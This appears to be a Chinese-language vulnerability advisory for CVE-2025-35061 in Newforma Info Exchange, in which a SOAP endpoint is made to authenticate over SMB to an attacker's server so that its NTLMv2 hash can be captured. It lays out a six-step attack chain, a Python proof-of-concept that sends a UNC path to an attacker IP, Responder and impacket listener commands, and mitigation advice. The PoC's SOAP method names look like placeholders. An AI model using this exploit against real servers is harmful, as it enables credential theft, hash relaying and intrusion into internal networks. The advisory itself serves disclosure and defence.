Newforma Info Exchange NTLMv2哈希强制捕获漏洞

漏洞信息

漏洞编号

CVE-2025-35061

漏洞类型

强制认证/NTLMv2哈希泄露

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Newforma Info Exchange (NIX)

漏洞概述

CVE-2025-35061是Newforma Info Exchange（NIX）软件中的一个中等严重性安全漏洞。该漏洞存在于'/NPCSRemoteWeb/LegacyIntegrationServices.asmx'端点中，允许远程未认证的攻击者迫使NIX服务器向攻击者控制的系统发起SMB连接请求。在建立SMB连接的过程中，NIX服务器会自动使用其配置的服务账户凭据进行NTLMv2身份验证，攻击者可以通过搭建恶意的SMB服务器（如使用Responder、impacket等工具）捕获该NTLMv2哈希值。获取到服务账户的NTLMv2哈希后，攻击者可以尝试离线破解以恢复明文密码，或者在支持NTLM中继的环境中执行NTLM中继攻击，进一步渗透内网系统。该漏洞的CVSS 3.1评分为5.9分，攻击向量为网络（AV:N），攻击复杂度较高（AC:H），无需权限（PR:N）和用户交互（UI:N），对机密性影响为高（C:H），完整性和可用性不受影响。该漏洞由CISA根据其漏洞协调披露流程发布，并参考了cisagov的CSAF（通用安全咨询框架）文件va-25-282-01。由于该漏洞影响的是企业级协作和项目信息交换平台，在建筑、工程和施工（AEC）行业广泛使用，因此潜在影响范围较大，可能导致敏感项目数据和企业凭据的泄露。

技术细节

该漏洞的核心原理是利用Newforma Info Exchange（NIX）的LegacyIntegrationServices.asmx Web服务端的SSRF（服务端请求伪造）或强制认证缺陷。具体技术细节如下：

1. 漏洞端点：'/NPCSRemoteWeb/LegacyIntegrationServices.asmx' 是NIX提供的遗留集成服务接口，该接口接受外部输入参数（如文件路径或UNC路径）而未进行充分的验证和过滤。

2. 攻击流程：攻击者向该端点发送精心构造的HTTP请求，将目标文件路径参数修改为指向攻击者控制的SMB共享路径（例如\\attacker.com\share或\\<attacker_IP>\share）。当NIX服务器处理该请求时，会尝试访问该UNC路径以执行文件操作（如读取、验证或集成）。

3. NTLMv2认证过程：在Windows环境下访问UNC路径时，系统会自动使用当前用户的凭据进行NTLMv2质询-响应认证。NIX服务账户的凭据会被自动发送到攻击者控制的SMB服务器。

4. 哈希捕获：攻击者在自己的服务器上运行如Responder（https://github.com/lgandx/Responder）或impacket的smbserver等工具，监听SMB认证请求并捕获NTLMv2哈希。

5. 后续利用：捕获的哈希可以使用hashcat或john the ripper等工具进行离线字典/暴力破解，或者在支持的环境中执行NTLM中继攻击（如使用ntlmrelayx），以访问其他内部服务。

该漏洞利用复杂度被评定为高（AC:H），主要是因为需要攻击者具备一定的网络可达性（如能够接受来自目标服务器的SMB连接回连），并且可能需要针对特定的网络环境进行配置。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标组织使用的Newforma Info Exchange（NIX）实例，通过网络侦察确定'/NPCSRemoteWeb/LegacyIntegrationServices.asmx'端点可访问。

STEP 2

步骤2：搭建监听环境

攻击者在自己的服务器上部署SMB监听工具（如Responder或impacket-smbserver），准备捕获NTLMv2认证哈希。

STEP 3

步骤3：构造恶意请求

攻击者向存在漏洞的端点发送包含恶意UNC路径（如\\attacker.com\share）的SOAP请求，诱导NIX服务器访问攻击者控制的SMB共享。

STEP 4

步骤4：哈希捕获

NIX服务器尝试访问UNC路径时，自动使用NIX服务账户凭据进行NTLMv2认证，攻击者的SMB监听器捕获到该哈希值。

STEP 5

步骤5：哈希破解或中继

攻击者使用hashcat等工具离线破解NTLMv2哈希以获取明文密码，或者利用ntlmrelayx等工具将认证中继到其他内部服务（如LDAP、SMTP等）。

STEP 6

步骤6：横向移动

一旦获取服务账户凭据或成功中继认证，攻击者可以利用该权限访问NIX系统中的敏感项目数据，或进一步在企业内网中进行横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-35061 - Newforma Info Exchange (NIX) NTLMv2 Hash Capture PoC
This PoC demonstrates how to force NIX server to send NTLMv2 hash to attacker-controlled SMB server.
Usage: python3 cve-2025-35061.py <target_url> <attacker_ip>
"""

import sys
import requests
import urllib.parse

def exploit(target_url, attacker_ip):
    """
    Send a crafted request to the vulnerable endpoint to force SMB authentication
    """
    # The vulnerable endpoint
    endpoint = f"{target_url}/NPCSRemoteWeb/LegacyIntegrationServices.asmx"
    
    # SOAPAction header for the legacy integration service
    headers = {
        "Content-Type": "text/xml; charset=utf-8",
        "SOAPAction": "http://tempuri.org/SomeMethod"
    }
    
    # Construct UNC path pointing to attacker's SMB server
    # The vulnerable parameter accepts file paths and doesn't validate UNC paths
    unc_path = f"\\\\{attacker_ip}\\share"
    
    # SOAP envelope with malicious file path
    soap_body = f"""<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
               xmlns:tem="http://tempuri.org/">
  <soap:Body>
    <tem:ProcessFile>
      <tem:filePath>{unc_path}</tem:filePath>
    </tem:ProcessFile>
  </soap:Body>
</soap:Envelope>"""
    
    print(f"[*] Target: {endpoint}")
    print(f"[*] Attacker IP: {attacker_ip}")
    print(f"[*] Sending malicious UNC path: {unc_path}")
    
    try:
        response = requests.post(endpoint, data=soap_body, headers=headers, timeout=10)
        print(f"[*] Response status: {response.status_code}")
        print(f"[*] Response body: {response.text[:500]}")
        print(f"[+] Exploit sent! Check your SMB listener (e.g., Responder) for NTLMv2 hash.")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python3 cve-2025-35061.py <target_url> <attacker_ip>")
        print("Example: python3 cve-2025-35061.py https://nix-victim.com 192.168.1.100")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    attacker_ip = sys.argv[2]
    exploit(target, attacker_ip)

# To capture the hash on attacker machine, run:
# sudo responder -I eth0 -wrf
# Or:
# impacket-smbserver share /tmp/smb -smb2support

影响范围

Newforma Info Exchange (NIX) - 所有未修复版本（具体版本范围待官方确认）

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）在网络防火墙或主机防火墙层面阻止NIX服务器主动向外发起SMB（445端口）连接；2）通过Web应用防火墙（WAF）规则过滤包含UNC路径（\\\\[IP或域名]\\）的恶意请求；3）为NIX服务账户设置强密码并启用账户锁定策略；4）监控NIX服务器的异常出站连接日志，及时发现潜在的攻击行为；5）如非必要，暂时限制外部网络对'/NPCSRemoteWeb/LegacyIntegrationServices.asmx'端点的访问权限。